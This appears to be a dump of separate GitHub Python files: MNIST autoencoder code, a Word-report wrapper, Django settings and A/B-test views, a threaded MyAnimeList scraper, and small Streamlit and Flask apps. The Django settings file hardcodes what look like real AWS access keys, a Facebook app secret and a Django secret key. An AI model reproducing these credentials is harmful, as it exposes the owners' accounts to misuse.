mnist_data_set.fft_autoencoder):\n\t\t\tadd_fft_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[1])\n\t\thybrid_data = mnist_data_set.fft_autoencoder[dim_tuple[1]]\n\telif dim_tuple[1] == 0:\n\t\tif ('autoencoder' not in dir(mnist_data_set) or \n\t\t\tdim_tuple[0] not in mnist_data_set.autoencoder):\n\t\t\tadd_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[0])\n\t\thybrid_data = mnist_data_set.autoencoder[dim_tuple[0]]\n\telse:\n\t\tif not ('autoencoder' in dir(mnist_data_set) and \n\t\t\tdim_tuple[0] in mnist_data_set.autoencoder):\n\t\t\tadd_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[0])\n\t\tif not ('fft_autoencoder' in dir(mnist_data_set) and \n\t\t\tdim_tuple[1] in mnist_data_set.fft_autoencoder):\n\t\t\tadd_fft_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[1])\n\t\thybrid_data = np.concatenate((mnist_data_set.autoencoder[dim_tuple[0]],\n\t\t\t\t\t\t\t\t mnist_data_set.fft_autoencoder[dim_tuple[1]]),\n\t\t\t\t\t\t\t\t axis = 1)\n\n\tif 'hybrid_autoencoder' in dir(mnist_data_set):\n\t\tmnist_data_set.hybrid_autoencoder[dim_tuple] = hybrid_data\n\telse:\n\t\tmnist_data_set.hybrid_autoencoder = {dim_tuple: hybrid_data}\n\n\ndef decode(encoded_data, dimension):\n\t\"\"\" Map from the autoencoded image space (with specified dimension) to the \n\toriginal image feature space \"\"\"\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(autoencoder_dir):\n\t\traise ValueError('No autoencoder for image data found for ' \n\t\t\t+ str(dimension) + ' dimensions.')\n\n\tpickle_pathname = os.path.join(autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\treturn encoded_data.dot(W.transpose())\n\n\ndef fft_decode(encoded_data, dimension):\n\t\"\"\" Map from the autoencoded FFT space (with specified dimension) to the \n\t\"compressed\" FFT feature space \"\"\"\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(fft_autoencoder_dir):\n\t\traise ValueError('No autoencoder for image data found for ' \n\t\t\t+ str(dimension) + ' dimensions.')\n\n\tpickle_pathname = os.path.join(fft_autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\treturn encoded_data.dot(W.transpose())\n\n\ndef image_from_compressed_fft(autoencoded_fft_data, data_set = 'mnist'):\n\t\"\"\" Obtain image pixels from \"compressed\" Fourier transformed MNIST data \"\"\"\n\tdimension = autoencoded_fft_data.shape[1]\n\tcompressed_fft_data = fft_decode(autoencoded_fft_data, dimension)\n\treturn np.real(np.fft.ifft2(decompress_fft(compressed_fft_data))).reshape(-1, 784)\n\n\ndef hybrid_decode(encoded_data, dim_tuple):\n\t\"\"\"Obtain image pixels from a hybrid (autoencoded and FFT autoencoded)\n\tfeature space\"\"\"\n\tif dim_tuple[0] == 0:\n\t\treturn image_from_compressed_fft(encoded_data)\n\tif dim_tuple[1] == 0:\n\t\treturn decode(encoded_data, dim_tuple[0])\n\n\tautoencoded_data = encoded_data[:,:dim_tuple[0]]\n\tfft_autoencoded_data = encoded_data[:, dim_tuple[0]:]\n\n\tautoencoded_image = decode(autoencoded_data, dim_tuple[0])\n\tfft_autoencoded_image = image_from_compressed_fft(\n\t\tfft_autoencoded_data, dim_tuple[1])\n\n\treturn (dim_tuple[0] * autoencoded_image + \n\t\tdim_tuple[1] * fft_autoencoded_image)/(\n\t\tdim_tuple[0] + dim_tuple[1])\n\n\ndef scale_encoder(mnist_data_set, encoding_type, dim_key):\n\t\"\"\" Scale an array of type encoding_type labelled by dim_key \"\"\"\n\tarray = getattr(mnist_data_set, encoding_type)[dim_key]\n\tif not (encoding_type + '_data' in dir(mnist_data_set) and\n\t\tdim_key in getattr(mnist_data_set, encoding_type + '_data')):\n\t\tscale_dict = {key: getattr(np, key)(array, axis = 0)\n\t\t\t\t\t for key in ['mean', 'max', 'min']}\n\t\tscaled_data = ((array - scale_dict['mean'])/\n\t\t\t (scale_dict['max'] - scale_dict['min']))\n\tif encoding_type + '_data' in dir(mnist_data_set):\n\t\tgetattr(mnist_data_set, encoding_type + '_data')[dim_key] = scale_dict\n\t\tgetattr(mnist_data_set, 'scaled_' + encoding_type)[dim_key] = scaled_data\n\telse:\n\t\tsetattr(mnist_data_set, encoding_type + '_data', {dim_key: scale_dict})\n\t\tsetattr(mnist_data_set, 'scaled_' + encoding_type, {dim_key: scaled_data})\n\n\ndef scale_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to scale an MNIST autoencoding with no FFT data.\"\"\"\n\tscale_encoder(mnist_data_set, 'autoencoder', dimension)\n\n\ndef scale_fft_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to scale an autoencoding of FFT-ed MNIST data.\"\"\"\n\tscale_encoder(mnist_data_set, 'fft_autoencoder', dimension)\n\n\ndef scale_hybrid_autoencoder(mnist_data_set, dim_tuple):\n\t\"\"\" Convenience function to scale a direct prodcut of autoencodings of\n\tunFFT-ed and FFT-ed MNIST data.\"\"\"\n\tscale_encoder(mnist_data_set, 'hybrid_autoencoder', dim_tuple)\n\n\ndef add_and_scale_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to obtain an MNIST autoencoding with no FFT data\n\t\tand then to scale it.\"\"\"\n\tadd_autoencoded_mnist_data_set(mnist_data_set, dimension)\n\tscale_autoencoder(mnist_data_set, dimension)\n\n\ndef add_and_scale_fft_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to obtain an autoencoding of FFT-ed MNIST data\n\t\tand then to scale it.\"\"\"\n\tadd_fft_autoencoded_mnist_data_set(mnist_data_set, dimension)\n\tscale_fft_autoencoder(mnist_data_set, dimension)\n\n\ndef add_and_scale_hybrid_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to obtain a direct prodcut of autoencodings of\n\tunFFT-ed and FFT-ed MNIST data and then to scale it.\"\"\"\n\tadd_hybrid_autoencoded_mnist_data_set(mnist_data_set, dimension)\n\tscale_hybrid_autoencoder(mnist_data_set, dimension)\n\n\ndef get_mnist_data_and_add_autoencodings(autoencoder_dict):\n\t\"\"\"Function to obtain mnist data, and add appropriate\n\tautoencodings as specified in autoencoder_dict.\"\"\"\n\tmnist = get_mnist_data()\n\tfor key in ['autoencoder', 'fft_autoencoder', \n\t\t\t\t'hybrid_autoencoder']:\n\t\tif key not in autoencoder_dict:\n\t\t\tautoencoder_dict[key] = {}\n\tfor subset in [\"train\", \"validation\", \"test\"]:\n\t\tdata_set = getattr(mnist, subset)\n\t\tfor dimension in autoencoder_dict['autoencoder']:\n\t\t\tadd_and_scale_autoencoder(data_set, dimension)\n\t\tfor dimension in autoencoder_dict['fft_autoencoder']:\n\t\t\tadd_and_scale_fft_autoencoder(data_set, dimension)\n\t\tfor dim_tuple in autoencoder_dict['hybrid_autoencoder']:\n\t\t\tadd_and_scale_hybrid_autoencoder(data_set, dim_tuple)\n\treturn mnist\n\n","repo_name":"JamieGainer/Linear_Autoencoder_and_FFT_for_MNIST","sub_path":"autoencoder_fft_mnist/fft_autoencoder.py","file_name":"fft_autoencoder.py","file_ext":"py","file_size_in_byte":11576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35023286554","text":"\"\"\" Wrapper onto python-docx library \"\"\"\nimport os\nfrom pyccata.core.interface import ReportingInterface\nfrom pyccata.core.decorators import accepts\nfrom pyccata.core.log import Logger\nfrom pyccata.core.parts.list import List\nfrom pyccata.core.configuration import Configuration\n\nfrom docx import Document\nfrom docx.shared import Inches\n\nclass Docx(object):\n \"\"\" Class for creating reports in Microsoft Word format \"\"\"\n __implements__ = (ReportingInterface,)\n _client = None\n _configuration = None\n _run = None\n _template_file = None\n\n MAXWIDTH = 5.7\n\n REQUIRED = [\n 'path',\n 'datapath',\n 'title',\n 'subtitle',\n 'abstract',\n 'sections'\n ]\n\n def __init__(self):\n \"\"\" Load the driver and create title page \"\"\"\n Logger().info('Initialising Microsoft Word format driver')\n self._configuration = Configuration()\n\n @property\n def client(self):\n \"\"\" Get the client interface \"\"\"\n if self._client is None:\n for location in self._configuration.locations:\n try:\n template = self._configuration.report.template if hasattr(\n self._configuration.report, 'template'\n ) else None\n\n Logger().debug('Checking for template file in \\'{0}\\''.format(location))\n template_file = os.path.join(str(location), str(template))\n with open(template_file):\n self._template_file = template_file\n Logger().info('Using template file ' + str(template_file))\n break\n except (IOError, TypeError):\n pass\n\n self._client = Document(docx=self._template_file)\n return self._client\n\n @accepts(str, style=(None, str))\n def add_paragraph(self, text, style=None):\n \"\"\"\n Add a paragraph of text to the report\n\n @param text string\n \"\"\"\n self._run = self.client.add_paragraph(str(text), style=style)\n\n @accepts(str, style=(None, str))\n def add_run(self, text, style=None):\n \"\"\"\n Adds a run of text to the current active paragraph\n\n @param text string\n @param style str\n \"\"\"\n if style is not None:\n setattr(self._run.add_run(text), style, True)\n else:\n self._run.add_run(text)\n\n @accepts(str, style=(None, str))\n def add_list(self, text, style=None):\n \"\"\"\n Add a paragraph of text to the report\n\n @param text string\n @param style string [ListBullet,ListNumber]\n \"\"\"\n paragraph = self.client.add_paragraph(str(text), style=style)\n paragraph.paragraph_format.left_indent = Inches(List.INDENT)\n\n @accepts(str, int)\n def add_heading(self, heading, level):\n \"\"\"\n Add a heading to the report\n\n @param heading string\n @param level int\n \"\"\"\n self.client.add_heading(str(heading), int(level))\n\n @accepts(headings=(None, list), data=(None, list), style=str)\n def add_table(self, headings=None, data=None, style=''):\n \"\"\"\n Add a table to the report\n\n @param headings list\n @param data list A nested lists of strings.\n @param style string\n \"\"\"\n table = self.client.add_table(rows=1, cols=len(headings), style=style)\n header_cells = table.rows[0].cells\n for i, heading in enumerate(headings):\n header_cells[i].text = str(heading)\n\n for row in data:\n cells = table.add_row().cells\n if not isinstance(row, list):\n row = list(row)\n if len(row) > len(headings):\n row = row[1:]\n for i, col in enumerate(row):\n cells[i].text = str(col)\n\n\n @accepts(str, width=(int, float))\n def add_picture(self, filename, width=0):\n \"\"\"\n Add a picture to the report\n\n @param filename string\n @param width int\n \"\"\"\n if width == 0:\n width = self.MAXWIDTH\n self.client.add_picture(filename, width=Inches(width))\n\n def add_page_break(self):\n \"\"\" Adds a page break to the report \"\"\"\n self.client.add_page_break()\n\n def format_for_email(self):\n \"\"\"\n Adds the document contents to a single table cell for display in email\n \"\"\"\n document = Document(docx=self._template_file)\n table = document.add_table(rows=1, cols=1)\n table.autofit = False\n\n cell = table.cell(0, 0)\n\n #pylint: disable=protected-access\n # We are extending the internals of the docx package to enable\n # this functionality. Therefore protected access is required\n cell._element[:] = self.client._body._body[:]\n cell.add_paragraph()\n\n self._client = document\n\n @accepts(str)\n def save(self, filename):\n \"\"\"\n Save the file to disk\n\n @param filename string\n \"\"\"\n self.client.save(filename)\n","repo_name":"mproffitt/pyccata","sub_path":"src/pyccata/core/managers/clients/docx.py","file_name":"docx.py","file_ext":"py","file_size_in_byte":5077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35768804009","text":"# coding:utf-8\nimport os\nimport iptools\n\nimport socket\n\nPRODUCTION = STAGING = DEVELOPMENT = False\n\nINTERNAL_IPS = iptools.IpRangeList(\n '127.0.0.1', # single ip\n '192.168/16', # CIDR network block\n ('10.0.0.1', '10.0.0.19'), # arbitrary range\n)\n\n# Absolute path to project directory.\n# If you rename/remove this you will break things\nPROJECT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n\nADMINS = (\n ('Jenso', 'jenso1988@gmail.com'),\n ('Samuel', 'smulster@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nSTATIC_URL = '/static/'\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Stockholm'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'sv'\n\nSITE_ID = 1\nSITE_DOMAIN = 'stylematch.se'\nSITE_NAME = 'Stylematch'\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_DOC_ROOT = os.path.join(PROJECT_DIR, \"static/\")\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\n\nSTATIC_ROOT = os.path.join(PROJECT_DIR, \"static/\")\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = STATIC_URL + 'admin/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_DIR, 'staticfiles'),\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '11ju*buxq(sqnmg%!^za&&v_+0=j#p2)iuhu+o6sw+lcdyfytl'\nif not SECRET_KEY:\n from logging import warn\n warn('Please set a unique SECRET_KEY in ' + __file__)\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\n# Replace information tag because jquery.noty accepts type: 'information'\n# instead.\nfrom django.contrib.messages import constants as message_constants\nNOTIFICATION = 23\nMESSAGE_TAGS = {\n NOTIFICATION: 'notification',\n message_constants.INFO: 'info',\n message_constants.SUCCESS: 'success',\n message_constants.WARNING: 'warning',\n message_constants.ERROR: 'error',\n }\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n PROJECT_DIR + \"/templates/\",\n # Put strings here, like\n # \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'registration',\n 'django.contrib.sitemaps',\n 'social_auth',\n 'django_extensions',\n 'south',\n 'bootstrap',\n 'braces',\n 'index',\n 'accounts',\n 'dashboard',\n 'storages',\n 'defaultsite',\n 'django_su',\n 'fts',\n 'sorl.thumbnail',\n 'gunicorn',\n)\n\nAWS_ACCESS_KEY_ID = 'AKIAJHCGEY6XAXXOSYXA'\nAWS_SECRET_ACCESS_KEY = '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'\n\nEMAIL_BACKEND = 'django_ses.SESBackend'\nDEFAULT_FROM_EMAIL = SERVER_EMAIL = 'hampus.bergqvist@stylematch.se'\n\"\"\"\nSERVER_EMAIL, default error message email.\nDEFAULT_FROM_EMAIL, all other mails\n\"\"\"\n\n### END Amazon credentials\n\n\n### social auth\n\nAUTHENTICATION_BACKENDS = (\n 'social_auth.backends.facebook.FacebookBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nFACEBOOK_APP_ID = '309825002426259'\nFACEBOOK_API_SECRET = 'd22e35493d901a90fafb05ae6e26fe7c'\n\n# when we upgrade to django 1.4,\n#these should be evaluated with reverse_lazy() and url_name\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/'\n#LOGIN_ERROR_URL = '/login-error/'\nSOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/konto/registrering-steg1/'\n\nSOCIAL_AUTH_DEFAULT_USERNAME = 'new_social_auth_user'\nSOCIAL_AUTH_EXTRA_DATA = False\nSOCIAL_AUTH_EXPIRATION = 'expires'\nSOCIAL_AUTH_SESSION_EXPIRATION = False\nSOCIAL_AUTH_ERROR_KEY = 'socialauth_error'\nSOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'\nFACEBOOK_AUTH_EXTRA_ARGUMENTS = {'display': 'popup'}\nSOCIAL_AUTH_ASSOCIATE_BY_MAIL = True\n# END social_auth\n\n# inform where user profile model is defined\nAUTH_PROFILE_MODULE = \"accounts.UserProfile\"\n\nLOG_DIR = os.path.join(PROJECT_DIR, 'log')\nBASE_LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['console', 'file_warning'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'file_debug': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': '%s/debug.log' % LOG_DIR,\n 'formatter': 'verbose',\n },\n 'file_warning': {\n 'level': 'WARNING',\n 'class': 'logging.FileHandler',\n 'filename': '%s/warning.log' % LOG_DIR,\n 'formatter': 'verbose',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n 'django': {\n 'level': 'DEBUG',\n 'handlers': ['file_debug'],\n 'propagate': True,\n },\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console', 'file_debug'],\n 'propagate': True,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['file_debug'],\n 'propagate': True,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['file_debug'],\n 'propagate': True,\n },\n },\n}\n\nSENTRY_LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'ERROR',\n 'class': 'raven.contrib.django.handlers.SentryHandler',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n# django-registration - dont remove or stuff will break\nACCOUNT_ACTIVATION_DAYS = 7\n\n# Galleria - should use some cdn in production\nGALLERIA_URL = STATIC_URL + \"js/galleria/src/\"\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.messages.context_processors.messages',\n 'django.contrib.auth.context_processors.auth',\n 'index.context_processors.galleria_urls',\n 'index.context_processors.django_settings',\n # used to access STATIC_URL in templates\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n )\n\n# Paths to user uploaded images, used in fileupload app\nPATH_USER_IMGS = \"user-imgs/\"\n\nMAX_IMAGE_SIZE = 20 * 1024 * 1024\nFULL_PATH_USER_IMGS = os.path.join(MEDIA_URL, PATH_USER_IMGS)\n\n# Google analytics key\nGOOGLE_ANALYTICS_KEY = \"\"\n\n# Google API Key\nGOOGLE_API_KEY = \"\"\n\n# Kissmetrics Key\nKISSMETRICS_KEY = \"\"\n\n# InterCom Key\nINTERCOM_KEY = \"\"\n","repo_name":"flashjames/Stylematch","sub_path":"settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7557485504","text":"import threading\nfrom urllib import request\nfrom requests import get\nimport json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport sqlite3\nfrom config import *\nimport time\nclass Extractor(threading.Thread):\n headers = {\n \"User-Agent\": \"MAL scraping for University project (Anime recommendation model). Contact juanda20202@hotmail.com if scraping is overburdening the server\"\n }\n\n def __init__(self, inf, top, i):\n self.__inf = inf\n self.__top = top\n self.__i = i\n threading.Thread.__init__(self)\n\n def queryUsers(self):\n with sqlite3.connect(DB) as conn:\n return list(pd.read_sql('SELECT DISTINCT username from reviews;',conn)['username'])\n\n def getAnimelist(self, username, userid):\n api = f\"https://myanimelist.net/animelist/{username}/load.json?status=7&offset=0\"\n\n try: \n response = get(api, headers=self.headers, timeout = 30)\n except Exception as e:\n print('Request timeout ', e)\n return\n if response.status_code == 403:\n return 'Error'\n df = pd.DataFrame.from_dict(response.json()) \n \n df['user_id'] = [userid]*len(df)\n #status 1 = watching \n #status 2 = completed \n #status 3 = on Hold\n #status 4 = dropped\n dfcleaned = df[df['status'] == 2][['user_id','anime_id','score','anime_title']].reset_index()\n return dfcleaned \n\n\n\n\n def run(self):\n users = self.queryUsers()\n fails = 0\n succesfull = 0\n user_fails = []\n exTime = time.time()\n\n interval = [self.__inf,self.__top] #interval of extraction\n auxrun = True\n paused = ''\n numberPaused = 1\n print(interval)\n for userid,user in enumerate(users[interval[0]:interval[1]]):\n if auxrun:\n animelistData = self.getAnimelist(user,userid+self.__inf)\n succesfull += 1\n auxrun = False\n else:\n try:\n aux = self.getAnimelist(user,userid+self.__inf)\n if type(aux) == str:\n print(f'-------Paused {numberPaused}-------------')\n paused = f\"Interval: {interval[0]} --- {interval[1]}.\\nPausedAt: {userid+self.__inf}\"\n print(paused) \n print('Time: ', time.time()-exTime)\n print('Succesful: ',succesfull)\n print('Fails: ',fails)\n print('-----------------------------','\\n')\n fails += 1\n numberPaused += 1\n time.sleep(360)\n print(f'Thread {self.__i} continuing')\n\n if aux is not None:\n animelistData = animelistData.append(aux, ignore_index = True)\n succesfull += 1\n else:\n fails += 1\n user_fails.append([userid,user])\n except Exception as e:\n fails += 1\n user_fails.append([userid,user])\n\n animelistData.drop('index', axis=1, inplace=True)\n exTime = time.time()-exTime\n print(animelistData)\n print('Fails: ', fails)\n print('Time: ', exTime)\n print('Succesful: ',succesfull)\n #print(paused)\n animelistData.to_csv(f\"animelistData{self.__i}.csv\")\n\n\nthreads = 4\ninterval = int(50524/threads)-1\n\nfor i in range(threads):\n Extractor( i*interval, i*interval + interval, i+1).start()\n\n\n\n\n\n\n\n#Join merging tables\n#'type','source','scored_by','score','favorites','members','popularity','studio'\n","repo_name":"dsceafit/animeai","sub_path":"model/scrapers/mallistextractor.py","file_name":"mallistextractor.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29761127316","text":"from django.shortcuts import render_to_response, HttpResponse, RequestContext, HttpResponseRedirect\nfrom django.contrib.messages import success\nfrom abTest import goalReached, render_to_ab_response\n\nfrom abTest.models import Test, TestResult, Goal, Experiment\n\ndef contact(request):\n context = RequestContext(request)\n return render_to_response(\"contact.html\", context_instance = context)\n\n\ndef home(request):\n context = RequestContext(request)\n return render_to_response(\"home.html\", context_instance = context)\n\ndef createLiveDemoData(request):\n if request.method == \"POST\":\n test = Test.objects.create(name = \"background\", active = True)\n test.goals.add(Goal.objects.create(name = \"buttonPressed\"))\n test.experiments.add(Experiment.objects.create(name=\"red\"))\n test.experiments.add(Experiment.objects.create(name=\"blue\"))\n test.experiments.add(Experiment.objects.create(name=\"green\"))\n test.save()\n success(request, \"Created live demo test data.\")\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n context = RequestContext(request)\n return render_to_response(\"createLiveDemoData.html\", context_instance = context)\n\ndef liveDemo(request):\n if not Test.objects.filter(name = \"background\").exists():\n return createLiveDemoData(request)\n context = RequestContext(request)\n testResults = {}\n for test in Test.objects.filter(active = True):\n testResult = {}\n results = TestResult.objects.filter(test = test)\n testResult['count'] = len(results)\n reachedTotal = 0\n experiments = {}\n for experiment in test.experiments.all():\n experimentResult = {}\n allRuns = results.filter(experiment = experiment)\n experimentResult['count'] = len(allRuns)\n reachedGoals = 0\n for run in allRuns:\n reachedGoals += len(run.goals.all())\n experimentResult['reachedGoals'] = reachedGoals\n experiments[experiment] = experimentResult\n reachedTotal += reachedGoals\n\n testResult['reachedGoals'] = reachedTotal\n testResult['experiments'] = experiments\n testResults[test] = testResult\n return render_to_response(\"liveDemo.html\", {'testResults' : testResults, 'site':'liveDemo'}, context_instance = context)\n\ndef reachedGoalButton(request):\n \"\"\"\n Earn a lot of money here, and set reached goal\n \"\"\"\n\n goalReached(request, \"buttonPressed\")\n success(request, \"thx for your money...\")\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef models(request):\n context = RequestContext(request)\n return render_to_response(\"models.html\", {'site':'models'}, context_instance = context)\n\ndef usage(request):\n context = RequestContext(request)\n return render_to_response(\"usage.html\", {'site':'usage'}, context_instance = context)\n\ndef home_old(request):\n if request.method == \"POST\":\n #get money here ....\n goalReached(request, \"example Goal\")\n\n return HttpResponse(\"thx for your money...\")\n context = RequestContext(request)\n return render_to_ab_response(request.abTest, {\n 'red' : 'abTest/red.html',\n 'blue' : 'abTest/blue.html',\n 'black' : 'abTest/black.html',\n }, defaultTemplate=\"abTest/example.html\", context_instance=context)\n #return render_to_response(\"abTest/example.html\", context_instance = context)\n\n","repo_name":"camillo/django-abTest","sub_path":"example/abWeb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12745723378","text":"from typing import List\n\nfrom pandas import DataFrame\n\nfrom cloudberry.api.model import SeriesInfo\n\n\nclass PlotSeries:\n def __init__(self,\n series_info: SeriesInfo,\n data: DataFrame,\n x_field: str,\n y_field: str,\n y_err_field: str = None):\n self.series_info = series_info\n self.data = data\n self.x_field = x_field\n self.y_field = y_field\n self.y_err_field = y_err_field\n\n\nclass PlotSeriesPack:\n def __init__(self,\n series: List[PlotSeries],\n averages: List[PlotSeries]):\n self.series = series\n self.averages = averages\n","repo_name":"cloudberry-agh-team/cloudberry-getting-started","sub_path":"cloudberry-py/cloudberry/plots/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72482401640","text":"import streamlit as st\nfrom helper import name_item_generator\n\nst.title('Restaurant name generator')\n\ncuisine = st.sidebar.selectbox('pick a restaurant', ('arabian', 'mexican', 'indian', 'spanish',\n 'italian','pakistani', 'iranian', 'american', 'british', 'african', 'turkish',\n 'german', 'finis', 'irish', 'portugese', 'scottish', 'english', 'armenian'))\n\nif cuisine:\n response = name_item_generator(cuisine)\n st.header(response['restaurant_name'])\n menu_items = response['menu_items'].split(',')\n st.write('**Menu Items**')\n for menu in menu_items:\n st.write(' -', menu)\n","repo_name":"Taoheed-O/FoodHomie","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3581929030","text":"import codecs\nimport os\n\nfrom flask import render_template, session, request\nfrom flask import send_from_directory\nfrom pysp.sconf import SYAML\n\nfrom . import app\nfrom .model import MStock, Reply\nfrom core.finance import BillConfig\n\n\n@app.route('/favicon.ico')\ndef favicon():\n return send_from_directory(os.path.join(app.root_path, 'static'),\n 'favicon.ico',mimetype='image/vnd.microsoft.icon')\n\n\n@app.route('/')\ndef index():\n recent_stocks = []\n if 'user_id' in session:\n recent_stocks = MStock.list(session['user_id'])\n return render_template('pages/index.html', recent_stocks=recent_stocks)\n\n\n@app.route('/ajax/bookmark', methods=['GET', 'POST'])\ndef ajax_bookmark():\n bcfg = BillConfig()\n bookmark = None\n if request.method == 'GET':\n if session and 'user_id' in session:\n bmfile = 'bookmark_userid_{uid:04d}.yml'\n _bookmark = bcfg.get_value('folder.bookmark')\n _bookmark += bmfile.format(uid=int(session['user_id']))\n if os.path.exists(_bookmark):\n bookmark = _bookmark\n if bookmark is None:\n _bookmark = bcfg.get_value('folder.bookmark')+'bookmark.yml'\n if os.path.exists(_bookmark):\n bookmark = 